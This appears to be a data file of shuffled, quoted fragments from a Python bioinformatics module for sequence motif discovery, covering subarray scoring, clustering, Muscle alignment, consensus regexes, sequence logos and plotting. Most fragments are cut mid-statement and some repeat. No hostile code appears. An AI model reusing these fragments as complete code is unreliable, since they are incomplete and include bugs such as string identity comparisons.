"txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id,",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i,",
"re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack):",
"c.most_common() code = '' for i, row in enumerate(cluster.T): c = Counter(row) k",
"yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on",
"plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp =",
"empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4",
"yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200):",
"is None or freq >= freq_th: if std_th is None or std <=",
"= '' for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common()",
"np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\"",
">= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th)",
"haystack)) size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th):",
"% (co) txt.append(info) info = ' - freq of occurrences of regex: %.2f'",
"nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches",
"cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs =",
"= [] info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info",
"sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png'",
"MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16,",
"= units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1]",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred,",
"np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row in",
"None elif len(code) == 1: code_str = code[0] else: code_str = '(' +",
"= y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution =",
"%s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in",
"from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList",
"align_seqs, 'seqs': seqs} return True, motif else: return False, None def compute_motives(self, clusters,",
"regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning(",
"%.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d",
"self.b) p_val = 1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\"",
"True if success is False: break # TODO: run the predictor to learn",
"import multiprocessing as mp import os from collections import defaultdict from eden import",
"vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base",
"centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j",
"motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in motives:",
"color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname)",
"-1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i",
"is None: ids = [cluster_id for cluster_id in motives] logos = dict() for",
"collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random",
"def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if",
"seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq",
"def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids =",
"wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units",
"try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p,",
"\"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40,",
"+= '<loc>' + str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq))",
"score >= min_score and len(align_seqs) > min_cluster_size: return True else: return False def",
"- start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f",
"= defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin)",
"pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in",
"subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header",
"= match.start() e = match.end() m = s + (e - s) /",
"first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True,",
"n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs == -1:",
"= fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence",
"exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size,",
"np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix)",
"len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200,",
"success is False: break # TODO: run the predictor to learn the new",
"neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1,",
"handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags",
"= motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d' % (co)",
"m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j",
"[1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y =",
"[cluster_id for cluster_id in motives] logos = dict() for cluster_id in ids: logo_image,",
"\"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return p_val",
"code = '' for i, row in enumerate(cluster.T): c = Counter(row) k =",
"in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = ''",
"begin, end, subseq = components p = self.compute_p_value(score) if p <= p_value: yield",
"fname txt = [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://'",
"= linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:, 0:2]: if",
"plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0)",
"- c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j in centers[j]:",
"headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1]",
"random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1 def ecdf(self,",
"centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i - c_j distances[(i,",
"= -1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for",
"return 1 / (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit",
"\"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs = None for",
"l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches",
"sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start",
"= compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray",
"neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time()",
"start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix)",
"k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code += l",
"self.b) p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution",
"(end - begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for",
"= Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT')",
"in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data",
"motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' %",
"motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in ms: if",
"if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\",
"= np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5,",
"if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True,",
"chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for i",
"self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format)",
"figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def",
"= sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for",
"in centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i - c_j",
"- loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i,",
"% (len(sig), median_len)) if sigs is None: if len(sig) >= median_len: sigs =",
"align_seq in align_seqs: trimmed_align_seq = [a for i, a in enumerate(align_seq) if i",
"np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5,",
"j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True:",
"id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary):",
"sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i",
"plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s",
"self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for",
"return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in",
"av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f",
"= motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)'",
"i, row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row /=",
"%d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in",
"%d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq']",
"(fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average",
"None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters:",
"Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size =",
"%s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray(",
"for match in re.finditer(needle, s): s = match.start() e = match.end() m =",
"= p.get() scores_items += scores d_time = time.time() - start_time d_loc_time = time.time()",
"\"\" for line in lines: if line: if line[0] == '>': if seq:",
"was selected. Increase p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count()",
"= random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs =",
"orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None):",
"\"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs == -1: pool",
"chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time()",
"compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs)",
"scipy.cluster.hierarchy import linkage import regex as re from collections import Counter from sklearn",
"%s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for",
"output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname)",
"plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives:",
"end:%s width:%s' % (val, start, end, width)) for h, s in seqs: if",
"options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis =",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None):",
"not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on: %d fragments'",
"+= str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to",
"preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime",
"else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator)) for",
"std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) ==",
"headers headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna':",
"logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y =",
"if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results =",
"class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name,",
"in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed",
"str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster",
"def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s,",
"c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs)",
"join all sequences in a cluster with enough space that # kmers dont",
"cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq']",
"p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs)",
"regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num co-occurences",
"begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids",
"fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/' + fname",
"= distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green',",
"% (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location(",
"cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True,",
"%d motives' % len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\"",
"self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit",
"plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else:",
"estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in",
"subseq)) if not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working on:",
"return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time =",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items =",
"= time.time() scores_items = [] for i, p in enumerate(results): loc_start_time = time.time()",
"try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs)",
"a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state",
"plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h,",
"is False: break # TODO: run the predictor to learn the new class",
"+= subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\"",
"figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname,",
"import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return",
"def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for",
"nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname",
"smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' %",
"for cluster_id in motives] logos = dict() for cluster_id in ids: logo_image, logo_txt",
"/ (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized",
"self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers,",
"self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator =",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0] return seq",
"seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime =",
"counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs =",
"'%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def",
"dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T):",
"l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s",
"for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as",
"def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown",
"y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0]",
"k = c.most_common() code = '' for i, row in enumerate(cluster.T): c =",
"a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a,",
"output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(),",
"== 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else:",
"os.getcwd() url = pwd + '/' + fname txt = [] if fill_width:",
"info2) # update motives motives[i] = motif del motives[j] success = True if",
"plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i,",
"dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = [] for i,",
"/ b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\"",
"2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for match",
"deleting: %d [%d is now #%d]' % \\ (j, i, n_i + n_j)",
"alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet =",
"options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width =",
"data): params = {'maxiters': 7} if self.diags is True: params['diags'] = True if",
"freq of occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st",
"args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs,",
"Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info",
"% len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for",
"else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5,",
"seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size,",
"half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\"",
"Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq",
"title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if",
"k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = []",
"- start val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod):",
"+ fname txt = [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img",
"pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt",
"_compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq in",
"= 2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield",
"title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='',",
"self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x)",
"size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets =",
"= [''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id]",
"yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack)",
"re from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance",
"mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs, vectorizer, estimator))",
"data = handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters': 7}",
"= tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids",
"j from any instance in i d_ij = [] for c_i in centers[i]:",
"annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time()",
"scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs,",
"/ size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex =",
"fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo",
"# ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def __init__(self,",
"\"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for",
"max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id",
"logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning(",
"performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer,",
"# ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line",
"= list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id =",
"output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else:",
"['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition = 'auto', scale_stack_widths=True, error_bars=True,",
"= motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.')",
"s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0,",
"handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def",
"else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format =",
"sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0",
"sigs is None: if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig)",
"(time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds =",
"s): s = match.start() e = match.end() m = s + (e -",
"dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for i, row in enumerate(cluster.T):",
